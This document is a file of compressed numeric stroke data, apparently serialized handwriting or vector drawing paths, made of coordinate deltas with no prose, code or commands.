16-95,0 1 0,1 2 0,56-4 1,84-3 61,-27 0 32,86 0 279,81 12 227,-307 0-690,8 7 11,3-1 7,2-1 158,0 0 0,0-1 0,0 0 0,1-2 0,-1 0-1,1 0 1,-1-1 0,31-3 0,-22 2 122,17 0-142,-39 0 27,-1 2-75,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,2 0 0,54 17 713,-47-16-513,6 2 58,-7-1 31,-11-2-205,-8 0-194,9 2 0,7-5 0,-4 5 0,6-2 0,2-1 0,0 1 0,10 9 0,-20-9 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,2 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,4 1 0,27 11 0,-1-2 0,128 20 0,-118-7 0,-32-20 0,32 19 0,33 18 0,-1 13 0,-59-48 0,-1 0 0,1-2 0,0 1 0,22 3 0,1 0 0,-37-8 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 2 0,-2-3 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,4 1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,6 5 0,30 22 0,-24-21 0,55 34 0,-61-38 0,12 10 0,10 5 0,-23-15 0,-5-1 0,-1-3 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,8 1 0,-1-2 0,0 0 0,-1 1 0,1 3 0,0-3 0,0-1 0,6-3-30,-21-2-73,-19-4-389,22 9 320,-47-15-6217,-1-1-5900,19 14 3460,17-3 4670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4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 34 544,'0'0'2612,"-11"-7"1301,12-1 2037,-2-7-1026,1 15-4892,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-2 2 1928,1 5-12,1-6-1875,0 0-1,0-1 0,-1 1 0,1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 0,0-1 1,1 1-1,-1-1 0,1 1 1,-1 0-1,0-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,-1-1-1,1 0 0,1 1 0,15 23 23,-9-12-50,55 38 643,-46-38-628,-14-11-55,-1 0 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,3 4 1,-1-2-22,1 0 1,-1-1-1,0 0 0,1 1 0,0-1 1,-1-1-1,6 4 0,21 19-69,-25-20 68,2 4 61,1-1 0,0 0 0,0 0 0,0-1 0,13 8 0,-19-14-42,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,-1 0 1,1 0 0,0 0-1,-1 0 1,1 1 0,0 2-1,11 7 17,-13-12-18,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,0-1 0,2 11-13,-48 25 23,2-9-4,14-9 10,11-4 51,-223 162 2548,196-142-2089,-19 12 226,-10-2-45,47-28-364,25-13-301,-1-1-1,1 1 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-7 0 1,8-1-29,-21-25-5785,11-10-6558,11 11 3339,0 17 4653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0 188 680,'0'0'2503,"2"-18"1800,70-67 873,-50 62-2480,-1 2-909,-20 20-1757,0-1 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1 1 0,1-1 0,1 0-1,39-11-129,-16 9 119,-24 2-8,1 1-1,0-1 1,-1 1 0,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1-1 0,-1 1 0,1 0 0,4 1 0,8 5 51,-14-6-58,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,3 3 0,-2-1-4,0-1 1,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,-2 5 0,-8 54 56,-14 29-21,20-76-37,-1-1 1,0 1 0,0-1 0,-2-1 0,1 1-1,-2-1 1,0 0 0,-18 19 0,-48 53 78,53-62-51,19-20-14,0 1 1,0 0 0,-1-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 0 0,-8 3 0,12-5 2,-1 0 0,0 0 0,0 0 1,0 1-1,1-1 0,-1 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 1,1 0-1,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 0 0,-11-3 140,12 4-154,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,7-24 14,-4 14-2,-2 9-13,-1-1 0,1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1-1,3-2 1,22-22 8,-25 23-10,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,4 1 0,7 3 2,-12-4 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,2 2 0,25 17 77,-24-18-76,0 0 0,-1 0 1,0 0-1,1 0 0,-1 1 1,0 0-1,0-1 0,0 1 1,4 6-1,-4-6 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,5-1 1,-1-2-99,-6-11-8403,0 2 2227,6 5 2643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1252,'0'-14'13137,"2"10"-10652,5 4-2471,-5 0-187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0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1544,'0'1'115,"1"-1"1,-1 0-1,0 0 0,1 0 0,-1 0 1,1-1-1,-1 1 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 0,0 0 1,0-1-1,1 1 0,-1 0 0,0-1 1,0 1-1,1 0 0,-1-1 0,0 1 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 1,0 0-26,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 1,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1-1-1,0 1 0,4 0 3276,-2 1-3150,-1-1 1,1 1-1,-1-1 1,0 1-1,1 0 1,-1 0 0,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 1-1,-1-1 1,1 0-1,0 0 1,1 2-1,8 17 698,-9-19-873,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 1 1,-1 0-1,1-1 0,-1 4 0,11 26 682,0 24 50,0-2-127,-1 1-149,-10-37-391,-1-13-94,1-1-1,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,2 4 1,-1 4-12,-2 8 14,-3-20-27,2 1-69,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1-1,1-3-1341,-2-12-7971,0 11 8303,-8-3-2302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10 186 588,'-9'-11'5874,"50"-34"-1684,-16 18-2800,-22 22-1155,0 1-1,1-1 0,0 1 1,0 0-1,0 0 0,1 1 1,8-6-1,39-41 2334,-48 48-2501,1-1-1,0 1 1,1 1 0,-1-1 0,0 1-1,0-1 1,1 2 0,-1-1 0,1 1-1,-1-1 1,0 1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,0 0-1,1 1 1,8 3 0,-6-3-39,1 0-1,-1 0 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 2 0,0-1-1,0 1 1,11 10-1,-17-14 1,0 0-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 0,-1-1 1,-1 3-1,-18 29 406,-34 28 518,38-35-504,16-25-432,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,2 2 0,2 1 32,1-1 0,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,1-1 0,10 2 0,61 16 140,-70-17-218,0 0 0,-1 1-1,1 0 1,0 1 0,-1-1-1,0 1 1,0 0-1,0 1 1,6 5 0,-11-9 55,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,-1 1-1,-27 31 965,18-22-670,4-5-172,1 0 0,-1-1 1,0 1-1,0-2 0,-11 7 0,-18 12 325,-31 7-65,52-22-397,-1 0 0,0-1 1,0-1-1,0 0 1,-1-1-1,-23 3 0,26-9-243,12-2-2540,20-9-6661,12-7 607,-19 12 5302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1640,'12'-13'7008,"-11"12"-6816,0 1 1,-1-1-1,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-1-1 0,1 0 0,0 1 1,0-1-1,0 1 0,1 1-17,0 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 4 0,1 6-4,0 0 0,-1 0 0,-1 0 0,0 16 0,10 31 71,-11-55-230,0-2 37,1 1 0,-1-1-1,0 0 1,0 1 0,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,-3 4-1,-1-1 239,5-4-235,0-1 1,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-1 0 0,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1-1 1,-1-1 27,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-4 0,0 2-58,1 0 1,-1 0-1,1-1 1,1 1 0,-1 0-1,1-1 1,0 1 0,0 0-1,2-6 1,0 4-66,-1 0 1,1 0-1,1 1 0,-1-1 1,1 1-1,0 0 1,0 0-1,1 0 0,0 0 1,0 1-1,6-5 0,46-27-5659,-1 7-5703,-37 23 8055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2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119 105 72,'0'0'124,"-1"0"0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 1,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1 0 0,2 4 170,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 0,6 6 0,-4-7-223,0 0 0,0 0 0,0 0-1,0 0 1,0-1 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 0 0,8-2 0,-5 1 116,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 0 0,-1 1 0,0-2 0,6-9 0,-8 11-20,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 1,0 0-1,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-2-6 0,1 8-104,1 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 0 0,1 1-1,0 0 1,-1-1 0,0 1 0,1 0-1,-1 0 1,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,0 1 0,-5 0 0,-21 0 292,17-1-276,0 1-1,-1 0 1,1 1 0,0 0-1,-1 1 1,1 1-1,-13 4 1,10-1-72,0 1 1,1 1-1,0 1 1,-25 19-1,28-20-34,9-6-71,0-1-1,0 1 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,1 1 1,-1-1-1,1 1 1,0-1-1,0 4 0,0-3-531,0 0 0,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 0 0,0 0-1,3 4 1,6 1-2660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29 668,'-2'-11'4354,"-6"11"1791,14 11-2546,9 8-1691,-5 18-1096,-5-28-670,1 6 146,-6 117 702,0-131-979,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 1,-1 1-1,1-1 0,-1 1 0,1-1 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,1-1 0,45-27 418,-34 19-453,59-43 47,-70 51-26,8 19-9,-10-12 15,0-6 5,0 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 1 1,-1-1-1,1 0 0,-1 1 0,0-1 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 1,0 0-1,22-15 1032,-19 12-965,0 0 0,0 0 1,-1 0-1,1 0 0,-1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,2-8 0,7-48 94,-10 58-167,1 0-19,-1 1-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0 0 0,0 0 1,0 0-1,-3-4 0,4 6-80,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,1 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,-1 18-9793,1-18 9500,0 6-2855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43 320,'-17'-11'3168,"12"8"-2397,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 1 0,0 1 0,-9-1 0,-12-2 1303,24 2-1845,0 0 0,0 1-1,0-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 1 1,-4 2 0,5-2 213,2-1-434,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,10 27-11,-2-6 4,-8-18-2,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,3 3 1,-3-3 0,1-1-1,-1 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 4 1,11 23-11,-11-28 13,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 0 1,-2 3-1,-6 7 19,8-9-18,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1-1-1,-4 2 1,-17 8 16,13-12 4,-5-6-11,14 8-180,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,1 0 0,0 0-464,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,2 0 0,6 0-2421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4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44 108 1612,'3'2'488,"-1"-1"1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 0,0 0 1,4 0-1,28-10 1488,-24 5-1602,-1-1 0,0 0 0,-1-1 1,9-8-1,-7 7-78,-10 7-143,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 0,1-1 1,-1 1-1,-1-1 0,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,0 1 1,1-1-1,-1 0 0,0 0 1,0-3-1,7-3 806,-5 6-682,-11-2 4,2 3-126,0 0 1,0 0 0,0 1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 2-1,1-1 1,-1 1-1,0 0 1,0 0 0,1 1-1,-1 0 1,-6 4-1,4-2-59,1 0-1,0 0 0,0 1 1,0 0-1,0 1 1,1-1-1,0 1 0,1 1 1,-11 14-1,16-20-92,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,2 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 1,0 1-1,2 2 0,21 27 98,-12-24-302,0 0 0,1 0-1,-1-1 1,1-1-1,1 0 1,-1-1 0,1 0-1,-1-1 1,1-1 0,0 0-1,0-1 1,21-1 0,-30 0-373,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,8-3 1,14-5-6227,-15 9 3309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12 474 892,'0'0'5813,"-11"7"2077,17-9-7471,-1 0-1,1 1 1,-1-2 0,1 1-1,-1-1 1,0 0-1,0 0 1,6-5-1,62-46 550,-46 35-868,45-41-1,8-13-111,-44 42 84,-1-2 0,42-52-1,-23 24 171,-35 47 46,-17 13-213,-1 1-1,0-1 1,1 1-1,-1-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0-1-1,-1 1 1,1 0 0,-1 0-1,2-3 1,-2 4-52,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 1 1,1-1 0,-1 0-1,0 1 1,0-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-10 52 769,9-35-703,2-1 0,0 0 1,6 28-1,-4-30-77,-1 0-1,-1 0 1,0 0 0,-2 22-1,0-22-3,1-1 0,0 1 0,1-1 0,4 21 0,3 12-2,-7-36-3,1 0 1,0 0 0,0-1-1,8 21 1,-2-10 7,-8-17-12,1-1-1,0 1 1,0-1 0,0 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,0 0 0,0-1-1,0 1 1,3 3 0,-3-5-25,-2-1-29,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 1,0 1-1,0-1 0,-30-37-11978,26 26 8689,-5-1 111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 1708,'-22'-5'10155,"55"5"-6184,96 30-2971,-45-14-5704,-39-14-3234,-34 3 4954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67 1464,'-10'-12'11898,"10"14"-11686,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 0 0,-1 1 0,0-1 0,-1 1 0,1 2-146,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,2 6 0,-1 5 43,-5 45 93,2-46-165,1 0 1,0 0-1,1 0 1,1 0-1,4 25 1,6 25 493,-9-55-460,-1 0 0,0 0-1,0 0 1,-1 17 0,-4-3 75,4-23-141,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1-3-4,0 1 0,0-1 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,1 0 0,0-4 0,0-5-7,-2-8 6,1 1 1,1 0-1,1 0 1,1 0-1,1 0 1,8-28 0,-1 13 13,-10 29-14,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,-1 0 1,1-1-1,6-7 0,-8 10 0,7-8-2,0 0 0,1 0 0,0 1 0,1 0 0,-1 1 1,2 0-1,0 0 0,0 1 0,18-10 0,-6 8-5,-15 6-2,1 0 1,-1 0-1,1 1 0,0 0 1,0 1-1,0 0 0,0 1 1,15-2-1,-24 4 8,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1-1 1,1 1-1,-27 24-16,24-22 13,-17 14-16,-2-2 0,0 0-1,0-1 1,-1-1 0,-25 10 0,34-16-497,0 2-1,0 0 1,0 0-1,1 1 1,-19 17-1,29-13-3374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29 1348,'11'1'11214,"-1"42"-6624,0-14-3826,-8-26-711,0 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 5-1,3 33 230,-2-36-255,-1 1 0,0-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,0-1-1,-3 10 0,-7 25 98,0 15 